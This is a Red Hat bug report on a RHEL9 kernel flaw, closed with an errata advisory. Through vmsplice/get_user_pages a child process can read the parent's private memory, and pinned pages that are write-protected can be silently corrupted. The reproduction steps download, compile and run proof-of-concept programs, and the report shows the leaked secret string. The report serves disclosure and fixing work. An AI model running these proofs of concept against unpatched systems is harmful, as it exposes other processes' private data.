Bug 1958742

Summary: RHEL9: fix for "CoW after fork()" aka "vmsplice child -> parent attack" aka "GUP after fork()" bug
Product: Red Hat Enterprise Linux 9 Reporter: Andrea Arcangeli <aarcange>
Component: kernelAssignee: Andrea Arcangeli <aarcange>
kernel sub component: Memory Management QA Contact: Li Wang <liwan>
Status: CLOSED ERRATA Docs Contact:
Severity: low    
Priority: unspecified CC: aarcange, aquini, cye, ddutile, hkrzesin, knoel, mm-maint, peterx
Version: 9.0Keywords: Triaged
Target Milestone: beta   
Target Release: 9.0   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: kernel-5.14.0-43.el9 Doc Type: No Doc Update
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2022-05-17 15:38:18 UTC Type: Bug
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:

Description Andrea Arcangeli 2021-05-10 04:41:34 UTC 
Description of two problems (first is a longstanding security issue that is easily reproducible since vmsplice was introduced, the second is an user ABI break vs RHEL8 and all kernels before commit 09854ba94c6aad7886996bfbee2530b3d8a7f4f4):

1) the child can read private memory of the parent process misusing get_user_pages (easy to reproduce with vmsplice as vector)

2) wrprotecting any pinned page no matter if short term or FOLL_LONGTERM or FOLL_PIN or FOLL_GET, may result in silent user data corruption. It has become a userland bug to wrprotect any page that may be pinned with mprotect(), clear_refs or any other MM code that has the capability of wrprotecting memory.

How reproducible: for 1) I modified the original testcase posted by Jann Horn on 27 May 2020 to show it still reproduces the security issue upstream.

Steps to Reproduce defect 1):

$ wget https://raw.githubusercontent.com/aagit/kernel-testcases-for-v5.11/main/vmsplice-v5.11.c
$ gcc vmsplice-v5.11.c -o vmsplice-v5.11 -O2
$ ./vmsplice-v5.11

Actual results: read string from child: THIS IS SECRET

Expected results: read string from child: BORING DATA

Steps to Reproduce defect 2):

$ wget https://raw.githubusercontent.com/aagit/kernel-testcases-for-v5.11/main/page_count_do_wp_page.c
$ gcc -o page_count_do_wp_page page_count_do_wp_page.c -O2 -lpthread
$ ./page_count_do_wp_page /tmp/whatever

Actual results: random memory corruption (not happening in RHEL8 or any kernel before 09854ba94c6aad7886996bfbee2530b3d8a7f4f4 broke the user ABI)

Expected results: same behavior as RHEL8, no output from this testcase, no user ABI break
Comment 25 errata-xmlrpc 2022-05-17 15:38:18 UTC 
Since the problem described in this bug report should be
resolved in a recent advisory, it has been closed with a
resolution of ERRATA.

For information on the advisory (new packages: kernel), and where to find the updated
files, follow the link below.

If the solution does not work for you, open a new bug report.

https://access.redhat.com/errata/RHBA-2022:3907